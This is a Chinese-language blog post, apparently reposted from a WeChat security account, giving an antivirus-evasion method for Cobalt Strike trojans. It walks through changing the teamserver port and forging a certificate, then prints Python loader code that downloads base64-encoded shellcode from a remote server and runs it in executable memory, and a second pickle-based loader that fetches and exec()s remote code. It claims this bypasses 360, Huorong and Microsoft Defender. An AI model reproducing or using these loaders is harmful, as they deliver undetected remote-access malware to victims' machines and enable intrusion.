【技术分享】Cobalt Strike免杀操作

admin 2021年4月30日09:40:15评论110 views字数 1945阅读6分29秒阅读模式
【技术分享】Cobalt Strike免杀操作点击上方蓝字关注我们


Cobalt Strike简介


Cobalt Strike是一款功能强大的渗透工具,集成了端口转发、提权、凭据导出、服务扫描、文件捆绑、木马生成,钓鱼等多种功能。Cobalt Strike作为一款协同工具,主要用于团队作战,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和sessions。

CS免杀操作


CS生成木马已经被各大杀毒软件加入病毒库,很容易被查杀,所以我们需进行一些免杀操作。首先,通过以下方法去除Cobalt Strike的特征。


一、修改默认端口


  • 在teamserver中,找到server_port,将默认端口50050修改为其他端口

        

二、修改证书


  • 使用java数据证书的管理工具Keytool,找到.store后缀的文件并删除,然后使用以下代码修改证书信息:

keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias baidu.com -dname "CN=US, OU=”baidu.com“, O=“Sofatest”, L=Beijing, ST=Cyberspace, C=CN"


然后参考360老哥的文章,shellcode和加载器(pyminifier混淆后)经base64编码后,放远程服务器备用。

然后远程下载两次,即可成功绕过360全家桶、火绒、微软专业版以及教育版。

【技术分享】Cobalt Strike免杀操作

【技术分享】Cobalt Strike免杀操作


【技术分享】Cobalt Strike免杀操作


【技术分享】Cobalt Strike免杀操作

shellcode="xfcx48x83xe4xf0xe8xc8x00x00x00'

import ctypes,urllib.request,codecs,base64shellcode = urllib.request.urlopen('http://ip/shellcode.txt').read()shellcode = shellcode.strip()shellcode = base64.b64decode(shellcode)shellcode =codecs.escape_decode(shellcode)[0]shellcode = bytearray(shellcode)ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)ctypes.windll.kernel32.RtlMoveMemory(    ctypes.c_uint64(ptr),     buf,     ctypes.c_int(len(shellcode))
handle = ctypes.windll.kernel32.CreateThread( ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

import pickleimport ctypes,urllib.request,codecs,base64sectr = urllib.request.urlopen('http://ip/loader.txt').read()sectr = base64.b64decode(sectr).decode("utf-8")class A(object):    def __reduce__(self):        return (exec, (sectr,))ret = pickle.dumps(A())ret_base64 = base64.b64encode(ret)ret_decode = base64.b64decode(ret_base64)pickle.loads(ret_decode)

混淆后,使用py2exe打包后即可使用。


后续shellcode可分段,改流量,其他加密混淆方式大家可自行测试。


至于如何绕过win10企业版,小智大佬不让我公开,要砍你们找他去吧。


【技术分享】Cobalt Strike免杀操作

END



【技术分享】Cobalt Strike免杀操作


好文!必须在看

本文始发于微信公众号(SecTr安全团队):【技术分享】Cobalt Strike免杀操作

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月30日09:40:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【技术分享】Cobalt Strike免杀操作http://cn-sec.com/archives/284234.html

发表评论

匿名网友 填写信息